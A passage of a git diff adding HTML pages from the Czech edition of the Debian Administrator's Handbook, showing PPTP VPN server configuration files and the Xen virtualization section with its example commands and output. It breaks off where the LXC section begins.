+                    class="filename">/etc/ppp/ip-down.d/falcot</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Delete the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route del -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> MPPE</strong></p></div></div></div><div
+                class="para">
+					Securing PPTP involves using the MPPE feature (<span
+                  class="emphasis"><em>Microsoft Point-to-Point Encryption</em></span>), which is available in official Debian kernels as a module.
+				</div><a
+                id="id-1.13.5.10.7.9.3"
+                class="indexterm"></a><a
+                id="id-1.13.5.10.7.9.4"
+                class="indexterm"></a></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.pptp-config-serveur"></a>10.2.4.2. Configuring the Server</h4></div></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CAUTION</em></span> PPTP and firewalls</strong></p></div></div></div><div
+                class="para">
+					Intermediate firewalls need to be configured to let through IP packets using protocol 47 (GRE). Moreover, the PPTP server's port 1723 needs to be open so that the communication channel can happen.
+				</div></div><div
+              class="para">
+					<code
+                class="command">pptpd</code> is the PPTP server for Linux. Its main configuration file, <code
+                class="filename">/etc/pptpd.conf</code>, requires very few changes: <span
+                class="emphasis"><em>localip</em></span> (local IP address) and <span
+                class="emphasis"><em>remoteip</em></span> (remote IP address). In the example below, the PPTP server always uses the <code
+                class="literal">192.168.0.199</code> address, and PPTP clients receive IP addresses from <code
+                class="literal">192.168.0.200</code> to <code
+                class="literal">192.168.0.250</code>.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.pptpd.conf"></a><p
+                class="title"><strong>Příklad 10.6. The <code
+                    class="filename">/etc/pptpd.conf</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# TAG: speed
+#
+#       Specifies the speed for the PPP daemon to talk at.
+#
+speed 115200
+
+# TAG: option
+#
+#       Specifies the location of the PPP options file.
+#       By default PPP looks in '/etc/ppp/options'
+#
+option /etc/ppp/pptpd-options
+
+# TAG: debug
+#
+#       Turns on (more) debugging to syslog
+#
+# debug
+
+# TAG: localip
+# TAG: remoteip
+#
+#       Specifies the local and remote IP address ranges.
+#
+#       You can specify single IP addresses separated by commas or you can
+#       specify ranges, or both. For example:
+#
+#               192.168.0.234,192.168.0.245-249,192.168.0.254
+#
+#       IMPORTANT RESTRICTIONS:
+#
+#       1. No spaces are permitted between commas or within addresses.
+#
+#       2. If you give more IP addresses than MAX_CONNECTIONS, it will
+#          start at the beginning of the list and go until it gets
+#          MAX_CONNECTIONS IPs. Others will be ignored.
+#
+#       3. No shortcuts in ranges! ie. 234-8 does not mean 234 to 238,
+#          you must type 234-238 if you mean this.
+#
+#       4. If you give a single localIP, that's ok - all local IPs will
+#          be set to the given one. You MUST still give at least one remote
+#          IP for each simultaneous client.
+#
+#localip 192.168.0.234-238,192.168.0.245
+#remoteip 192.168.1.234-238,192.168.1.245
+#localip 10.0.1.1
+#remoteip 10.0.1.2-100
+localip 192.168.0.199
+remoteip 192.168.0.200-250
+</pre></div></div><div
+              class="para">
+					The PPP configuration used by the PPTP server also requires a few changes in <code
+                class="filename">/etc/ppp/pptpd-options</code>. The important parameters are the server name (<code
+                class="literal">pptp</code>), the domain name (<code
+                class="literal">falcot.com</code>), and the IP addresses for DNS and WINS servers.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-pptpd-options"></a><p
+                class="title"><strong>Příklad 10.7. The <code
+                    class="filename">/etc/ppp/pptpd-options</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+## turn pppd syslog debugging on
+#debug
+
+## change 'servername' to whatever you specify as your server name in chap-secrets
+name pptp
+## change the domainname to your local domain
+domain falcot.com
+
+## these are reasonable defaults for WinXXXX clients
+## for the security related settings
+# The Debian pppd package now supports both MSCHAP and MPPE, so enable them
+# here. Please note that the kernel support for MPPE must also be present!
+auth
+require-chap
+require-mschap
+require-mschap-v2
+require-mppe-128
+
+## Fill in your addresses
+ms-dns 192.168.0.1
+ms-wins 192.168.0.1
+
+## Fill in your netmask
+netmask 255.255.255.0
+
+## some defaults
+nodefaultroute
+proxyarp
+lock
+</pre></div></div><div
+              class="para">
+					The last step involves registering the <code
+                class="literal">vpn</code> user (and the associated password) in the <code
+                class="filename">/etc/ppp/chap-secrets</code> file. Contrary to other instances where an asterisk (<code
+                class="literal">*</code>) would work, the server name must be filled explicitly here. Furthermore, Windows PPTP clients identify themselves under the <code
+                class="literal"><em
+                  class="replaceable">DOMAIN</em>\\<em
+                  class="replaceable">USER</em></code> form, instead of only providing a user name. This explains why the file also mentions the <code
+                class="literal">FALCOT\\vpn</code> user. It is also possible to specify individual IP addresses for users; an asterisk in this field specifies that dynamic addressing should be used.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-chap-secrets"></a><p
+                class="title"><strong>Příklad 10.8. The <code
+                    class="filename">/etc/ppp/chap-secrets</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Secrets for authentication using CHAP
+# client        server  secret      IP addresses
+vpn             pptp    f@Lc3au     *
+FALCOT\\vpn     pptp    f@Lc3au     *
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> PPTP vulnerabilities</strong></p></div></div></div><div
+                class="para">
+					Microsoft's first PPTP implementation drew severe criticism because it had many security vulnerabilities; most have since then been fixed in more recent versions. The configuration documented in this section uses the latest version of the protocol. Be aware though that removing some options (such as <code
+                  class="literal">require-mppe-128</code> and <code
+                  class="literal">require-mschap-v2</code>) would make the service vulnerable again.
+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-infrastructure.html"><strong>Předcházející</strong>Kapitola 10. Network Infrastructure</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quality-of-service.html"><strong>Další</strong>10.3. Quality of Service</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtualization.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtualization.html
new file mode 100644
index 000000000..049d51701
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtualization.html
@@ -0,0 +1,1205 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">12.2. Virtualization</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="prev"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="next"
+        href="sect.automated-installation.html"
+        title="12.3. Automated Installation" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.virtualization.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="advanced-administration.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automated-installation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.virtualization"></a>12.2. Virtualization</h2></div></div></div><a
+          id="id-1.15.5.2"
+          class="indexterm"></a><div
+          class="para">
+			Virtualization is one of the most major advances in the recent years of computing. The term covers various abstractions and techniques simulating virtual computers with a variable degree of independence on the actual hardware. One physical server can then host several systems working at the same time and in isolation. Applications are many, and often derive from this isolation: test environments with varying configurations for instance, or separation of hosted services across different virtual machines for security.
+		</div><div
+          class="para">
+			There are multiple virtualization solutions, each with its own pros and cons. This book will focus on Xen, LXC, and KVM, but other noteworthy implementations include the following:
+		</div><a
+          id="id-1.15.5.5"
+          class="indexterm"></a><a
+          id="id-1.15.5.6"
+          class="indexterm"></a><a
+          id="id-1.15.5.7"
+          class="indexterm"></a><a
+          id="id-1.15.5.8"
+          class="indexterm"></a><a
+          id="id-1.15.5.9"
+          class="indexterm"></a><a
+          id="id-1.15.5.10"
+          class="indexterm"></a><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					QEMU is a software emulator for a full computer; performances are far from the speed one could achieve running natively, but this allows running unmodified or experimental operating systems on the emulated hardware. It also allows emulating a different hardware architecture: for instance, an <span
+                  class="emphasis"><em>amd64</em></span> system can emulate an <span
+                  class="emphasis"><em>arm</em></span> computer. QEMU is free software. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.qemu.org/">http://www.qemu.org/</a></div>
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					Bochs is another free virtual machine, but it only emulates the x86 architectures (i386 and amd64).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					VMWare is a proprietary virtual machine; being one of the oldest out there, it is also one of the most widely-known. It works on principles similar to QEMU. VMWare proposes advanced features such as snapshotting a running virtual machine. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.vmware.com/">http://www.vmware.com/</a></div>
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					VirtualBox is a virtual machine that is mostly free software (some extra components are available under a proprietary license). Unfortunately it is in Debian's “contrib” section because it includes some precompiled files that cannot be rebuilt without a proprietary compiler and it currently only resides in Debian Unstable as Oracle's policies make it impossible to keep it secure in a Debian stable release (see <a
+                  href="https://bugs.debian.org/794466">#794466</a>). While younger than VMWare and restricted to the i386 and amd64 architectures, it still includes some snapshotting and other interesting features. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.virtualbox.org/">http://www.virtualbox.org/</a></div>
+				</div></li></ul></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.xen"></a>12.2.1. Xen</h3></div></div></div><div
+            class="para">
+				Xen <a
+              id="id-1.15.5.12.2.1"
+              class="indexterm"></a> is a “paravirtualization” solution. It introduces a thin abstraction layer, called a “hypervisor”, between the hardware and the upper systems; this acts as a referee that controls access to hardware from the virtual machines. However, it only handles a few of the instructions, the rest is directly executed by the hardware on behalf of the systems. The main advantage is that performances are not degraded, and systems run close to native speed; the drawback is that the kernels of the operating systems one wishes to use on a Xen hypervisor need to be adapted to run on Xen.
+			</div><div
+            class="para">
+				Let's spend some time on terms. The hypervisor is the lowest layer, that runs directly on the hardware, even below the kernel. This hypervisor can split the rest of the software across several <span
+              class="emphasis"><em>domains</em></span>, which can be seen as so many virtual machines. One of these domains (the first one that gets started) is known as <span
+              class="emphasis"><em>dom0</em></span>, and has a special role, since only this domain can control the hypervisor and the execution of other domains. These other domains are known as <span
+              class="emphasis"><em>domU</em></span>. In other words, and from a user point of view, the <span
+              class="emphasis"><em>dom0</em></span> matches the “host” of other virtualization systems, while a <span
+              class="emphasis"><em>domU</em></span> can be seen as a “guest”.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Xen and the various versions of Linux</strong></p></div></div></div><div
+              class="para">
+				Xen was initially developed as a set of patches that lived out of the official tree, and not integrated to the Linux kernel. At the same time, several upcoming virtualization systems (including KVM) required some generic virtualization-related functions to facilitate their integration, and the Linux kernel gained this set of functions (known as the <span
+                class="emphasis"><em>paravirt_ops</em></span> or <span
+                class="emphasis"><em>pv_ops</em></span> interface). Since the Xen patches were duplicating some of the functionality of this interface, they couldn't be accepted officially.
+			</div><div
+              class="para">
+				Xensource, the company behind Xen, therefore had to port Xen to this new framework, so that the Xen patches could be merged into the official Linux kernel. That meant a lot of code rewrite, and although Xensource soon had a working version based on the paravirt_ops interface, the patches were only progressively merged into the official kernel. The merge was completed in Linux 3.0. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/XenParavirtOps">http://wiki.xenproject.org/wiki/XenParavirtOps</a></div>
+			</div><div
+              class="para">
+				Since <span
+                class="distribution distribution">Jessie</span> is based on version 3.16 of the Linux kernel, the standard <span
+                class="pkg pkg">linux-image-686-pae</span> and <span
+                class="pkg pkg">linux-image-amd64</span> packages include the necessary code, and the distribution-specific patching that was required for <span
+                class="distribution distribution">Squeeze</span> and earlier versions of Debian is no more. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/Xen_Kernel_Feature_Matrix">http://wiki.xenproject.org/wiki/Xen_Kernel_Feature_Matrix</a></div>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Architectures compatible with Xen</strong></p></div></div></div><div
+              class="para">
+				Xen is currently only available for the i386, amd64, arm64 and armhf architectures.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Xen and non-Linux kernels</strong></p></div></div></div><div
+              class="para">
+				Xen requires modifications to all the operating systems one wants to run on it; not all kernels have the same level of maturity in this regard. Many are fully-functional, both as dom0 and domU: Linux 3.0 and later, NetBSD 4.0 and later, and OpenSolaris. Others only work as a domU. You can check the status of each operating system in the Xen wiki: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/Dom0_Kernels_for_Xen">http://wiki.xenproject.org/wiki/Dom0_Kernels_for_Xen</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.xenproject.org/wiki/DomU_Support_for_Xen">http://wiki.xenproject.org/wiki/DomU_Support_for_Xen</a></div>
+			</div><div
+              class="para">
+				However, if Xen can rely on the hardware functions dedicated to virtualization (which are only present in more recent processors), even non-modified operating systems can run as domU (including Windows).
+			</div></div><div
+            class="para">
+				Using Xen under Debian requires three components:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						The hypervisor itself. According to the available hardware, the appropriate package will be either <span
+                    class="pkg pkg">xen-hypervisor-4.4-amd64</span>, <span
+                    class="pkg pkg">xen-hypervisor-4.4-armhf</span>, or <span
+                    class="pkg pkg">xen-hypervisor-4.4-arm64</span>.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						A kernel that runs on that hypervisor. Any kernel more recent than 3.0 will do, including the 3.16 version present in <span
+                    class="distribution distribution">Jessie</span>.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						The i386 architecture also requires a standard library with the appropriate patches taking advantage of Xen; this is in the <span
+                    class="pkg pkg">libc6-xen</span> package.
+					</div></li></ul></div><div
+            class="para">
+				In order to avoid the hassle of selecting these components by hand, a few convenience packages (such as <span
+              class="pkg pkg">xen-linux-system-amd64</span>) have been made available; they all pull in a known-good combination of the appropriate hypervisor and kernel packages. The hypervisor also brings <span
+              class="pkg pkg">xen-utils-4.4</span>, which contains tools to control the hypervisor from the dom0. This in turn brings the appropriate standard library. During the installation of all that, configuration scripts also create a new entry in the Grub bootloader menu, so as to start the chosen kernel in a Xen dom0. Note however that this entry is not usually set to be the first one in the list, and will therefore not be selected by default. If that is not the desired behavior, the following commands will change it:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>mv /etc/grub.d/20_linux_xen /etc/grub.d/09_linux_xen
+</code></strong><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>update-grub
+</code></strong></pre><div
+            class="para">
+				Once these prerequisites are installed, the next step is to test the behavior of the dom0 by itself; this involves a reboot to the hypervisor and the Xen kernel. The system should boot in its standard fashion, with a few extra messages on the console during the early initialization steps.
+			</div><div
+            class="para">
+				Now is the time to actually install useful systems on the domU systems, using the tools from <span
+              class="pkg pkg">xen-tools</span>. This package provides the <code
+              class="command">xen-create-image</code> command, which largely automates the task. The only mandatory parameter is <code
+              class="literal">--hostname</code>, giving a name to the domU; other options are important, but they can be stored in the <code
+              class="filename">/etc/xen-tools/xen-tools.conf</code> configuration file, and their absence from the command line doesn't trigger an error. It is therefore important to either check the contents of this file before creating images, or to use extra parameters in the <code
+              class="command">xen-create-image</code> invocation. Important parameters of note include the following:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--memory</code>, to specify the amount of RAM dedicated to the newly created system;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--size</code> and <code
+                    class="literal">--swap</code>, to define the size of the “virtual disks” available to the domU;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--debootstrap</code>, to cause the new system to be installed with <code
+                    class="command">debootstrap</code>; in that case, the <code
+                    class="literal">--dist</code> option will also most often be used (with a distribution name such as <span
+                    class="distribution distribution">jessie</span>).
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>GOING FURTHER</em></span> Installing a non-Debian system in a domU</strong></p></div></div></div><div
+                    class="para">
+						In case of a non-Linux system, care should be taken to define the kernel the domU must use, using the <code
+                      class="literal">--kernel</code> option.
+					</div></div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">--dhcp</code> states that the domU's network configuration should be obtained by DHCP while <code
+                    class="literal">--ip</code> allows defining a static IP address.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Lastly, a storage method must be chosen for the images to be created (those that will be seen as hard disk drives from the domU). The simplest method, corresponding to the <code
+                    class="literal">--dir</code> option, is to create one file on the dom0 for each device the domU should be provided. For systems using LVM, the alternative is to use the <code
+                    class="literal">--lvm</code> option, followed by the name of a volume group; <code
+                    class="command">xen-create-image</code> will then create a new logical volume inside that group, and this logical volume will be made available to the domU as a hard disk drive.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>NOTE</em></span> Storage in the domU</strong></p></div></div></div><div
+                    class="para">
+						Entire hard disks can also be exported to the domU, as well as partitions, RAID arrays or pre-existing LVM logical volumes. These operations are not automated by <code
+                      class="command">xen-create-image</code>, however, so editing the Xen image's configuration file is in order after its initial creation with <code
+                      class="command">xen-create-image</code>.
+					</div></div></li></ul></div><div
+            class="para">
+				Once these choices are made, we can create the image for our future Xen domU:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>xen-create-image --hostname testxen --dhcp --dir /srv/testxen --size=2G --dist=jessie --role=udev</code></strong>
+<code
+              class="computeroutput">
+[...]
+General Information
+--------------------
+Hostname       :  testxen
+Distribution   :  jessie
+Mirror         :  http://ftp.debian.org/debian/
+Partitions     :  swap            128Mb (swap)
+                  /               2G    (ext3)
+Image type     :  sparse
+Memory size    :  128Mb
+Kernel path    :  /boot/vmlinuz-3.16.0-4-amd64
+Initrd path    :  /boot/initrd.img-3.16.0-4-amd64
+[...]
+Logfile produced at:
+         /var/log/xen-tools/testxen.log
+
+Installation Summary
+---------------------
+Hostname        :  testxen
+Distribution    :  jessie
+MAC Address     :  00:16:3E:8E:67:5C
+IP-Address(es)  :  dynamic
+RSA Fingerprint :  0a:6e:71:98:95:46:64:ec:80:37:63:18:73:04:dd:2b
+Root Password   :  adaX2jyRHNuWm8BDJS7PcEJ
+</code></pre><div
+            class="para">
+				We now have a virtual machine, but it is currently not running (and therefore only using space on the dom0's hard disk). Of course, we can create more images, possibly with different parameters.
+			</div><div
+            class="para">
+				Before turning these virtual machines on, we need to define how they'll be accessed. They can of course be considered as isolated machines, only accessed through their system console, but this rarely matches the usage pattern. Most of the time, a domU will be considered as a remote server, and accessed only through a network. However, it would be quite inconvenient to add a network card for each domU; which is why Xen allows creating virtual interfaces, that each domain can see and use in a standard way. Note that these cards, even though they're virtual, will only be useful once connected to a network, even a virtual one. Xen has several network models for that:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						The simplest model is the <span
+                    class="emphasis"><em>bridge</em></span> model; all the eth0 network cards (both in the dom0 and the domU systems) behave as if they were directly plugged into an Ethernet switch.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Then comes the <span
+                    class="emphasis"><em>routing</em></span> model, where the dom0 behaves as a router that stands between the domU systems and the (physical) external network.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Finally, in the <span
+                    class="emphasis"><em>NAT</em></span> model, the dom0 is again between the domU systems and the rest of the network, but the domU systems are not directly accessible from outside, and traffic goes through some network address translation on the dom0.
+					</div></li></ul></div><div
+            class="para">
+				These three networking nodes involve a number of interfaces with unusual names, such as <code
+              class="filename">vif*</code>, <code
+              class="filename">veth*</code>, <code
+              class="filename">peth*</code> and <code
+              class="filename">xenbr0</code>. The Xen hypervisor arranges them in whichever layout has been defined, under the control of the user-space tools. Since the NAT and routing models are only adapted to particular cases, we will only address the bridging model.
+			</div><div
+            class="para">
+				The standard configuration of the Xen packages does not change the system-wide network configuration. However, the <code
+              class="command">xend</code> daemon is configured to integrate virtual network interfaces into any pre-existing network bridge (with <code
+              class="filename">xenbr0</code> taking precedence if several such bridges exist). We must therefore set up a bridge in <code
+              class="filename">/etc/network/interfaces</code> (which requires installing the <span
+              class="pkg pkg">bridge-utils</span> package, which is why the <span
+              class="pkg pkg">xen-utils-4.4</span> package recommends it) to replace the existing eth0 entry:
+			</div><pre
+            class="programlisting">auto xenbr0
+iface xenbr0 inet dhcp
+    bridge_ports eth0
+    bridge_maxwait 0
+</pre><div
+            class="para">
+				After rebooting to make sure the bridge is automatically created, we can now start the domU with the Xen control tools, in particular the <code
+              class="command">xl</code> command. This command allows different manipulations on the domains, including listing them and, starting/stopping them.
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>xl list</code></strong>
+<code
+              class="computeroutput">Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   463     1     r-----      9.8
+# </code><strong
+              class="userinput"><code>xl create /etc/xen/testxen.cfg</code></strong>
+<code
+              class="computeroutput">Parsing config from /etc/xen/testxen.cfg
+# </code><strong
+              class="userinput"><code>xl list</code></strong>
+<code
+              class="computeroutput">Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   366     1     r-----     11.4
+testxen                                      1   128     1     -b----      1.1</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Choice of toolstacks to manage Xen VM</strong></p></div></div></div><a
+              id="id-1.15.5.12.24.2"
+              class="indexterm"></a><a
+              id="id-1.15.5.12.24.3"
+              class="indexterm"></a><div
+              class="para">
+				In Debian 7 and older releases, <code
+                class="command">xm</code> was the reference command line tool to use to manage Xen virtual machines. It has now been replaced by <code
+                class="command">xl</code> which is mostly backwards compatible. But those are not the only available tools: <code
+                class="command">virsh</code> of libvirt and <code
+                class="command">xe</code> of XenServer's XAPI (commercial offering of Xen) are alternative tools.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Only one domU per image!</strong></p></div></div></div><div
+              class="para">
+				While it is of course possible to have several domU systems running in parallel, they will all need to use their own image, since each domU is made to believe it runs on its own hardware (apart from the small slice of the kernel that talks to the hypervisor). In particular, it isn't possible for two domU systems running simultaneously to share storage space. If the domU systems are not run at the same time, it is however quite possible to reuse a single swap partition, or the partition hosting the <code
+                class="filename">/home</code> filesystem.
+			</div></div><div
+            class="para">
+				Note that the <code
+              class="filename">testxen</code> domU uses real memory taken from the RAM that would otherwise be available to the dom0, not simulated memory. Care should therefore be taken, when building a server meant to host Xen instances, to provision the physical RAM accordingly.
+			</div><div
+            class="para">
+				Voilà! Our virtual machine is starting up. We can access it in one of two modes. The usual way is to connect to it “remotely” through the network, as we would connect to a real machine; this will usually require setting up either a DHCP server or some DNS configuration. The other way, which may be the only way if the network configuration was incorrect, is to use the <code
+              class="filename">hvc0</code> console, with the <code
+              class="command">xl console</code> command:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>xl console testxen</code></strong>
+<code
+              class="computeroutput">[...]
+
+Debian GNU/Linux 8 testxen hvc0
+
+testxen login: </code></pre><div
+            class="para">
+				One can then open a session, just like one would do if sitting at the virtual machine's keyboard. Detaching from this console is achieved through the <span
+              class="keycap"><strong>Control</strong></span>+<span
+              class="keycap"><strong>]</strong></span> key combination.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Getting the console straight away</strong></p></div></div></div><div
+              class="para">
+				Sometimes one wishes to start a domU system and get to its console straight away; this is why the <code
+                class="command">xl create</code> command takes a <code
+                class="literal">-c</code> switch. Starting a domU with this switch will display all the messages as the system boots.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> OpenXenManager</strong></p></div></div></div><div
+              class="para">
+				OpenXenManager (in the <span
+                class="pkg pkg">openxenmanager</span> package) is a graphical interface allowing remote management of Xen domains via Xen's API. It can thus control Xen domains remotely. It provides most of the features of the <code
+                class="command">xl</code> command.
+			</div></div><div
+            class="para">
+				Once the domU is up, it can be used just like any other server (since it is a GNU/Linux system after all). However, its virtual machine status allows some extra features. For instance, a domU can be temporarily paused then resumed, with the <code
+              class="command">xl pause</code> and <code
+              class="command">xl unpause</code> commands. Note that even though a paused domU does not use any processor power, its allocated memory is still in use. It may be interesting to consider the <code
+              class="command">xl save</code> and <code
+              class="command">xl restore</code> commands: saving a domU frees the resources that were previously used by this domU, including RAM. When restored (or unpaused, for that matter), a domU doesn't even notice anything beyond the passage of time. If a domU was running when the dom0 is shut down, the packaged scripts automatically save the domU, and restore it on the next boot. This will of course involve the standard inconvenience incurred when hibernating a laptop computer, for instance; in particular, if the domU is suspended for too long, network connections may expire. Note also that Xen is so far incompatible with a large part of ACPI power management, which precludes suspending the host (dom0) system.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> <code
+                        class="command">xl</code> options</strong></p></div></div></div><div
+              class="para">
+				Most of the <code
+                class="command">xl</code> subcommands expect one or more arguments, often a domU name. These arguments are well described in the <span
+                class="citerefentry"><span
+                  class="refentrytitle">xl</span>(1)</span> manual page.
+			</div></div><div
+            class="para">
+				Halting or rebooting a domU can be done either from within the domU (with the <code
+              class="command">shutdown</code> command) or from the dom0, with <code
+              class="command">xl shutdown</code> or <code
+              class="command">xl reboot</code>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Advanced Xen</strong></p></div></div></div><div
+              class="para">
+				Xen has many more features than we can describe in these few paragraphs. In particular, the system is very dynamic, and many parameters for one domain (such as the amount of allocated memory, the visible hard drives, the behavior of the task scheduler, and so on) can be adjusted even when that domain is running. A domU can even be migrated across servers without being shut down, and without losing its network connections! For all these advanced aspects, the primary source of information is the official Xen documentation. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.xen.org/support/documentation.html">http://www.xen.org/support/documentation.html</a></div>
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.lxc"></a>12.2.2. LXC</h3></div></div></div><a
+            id="id-1.15.5.13.2"
+            class="indexterm"></a><div
+            class="para">
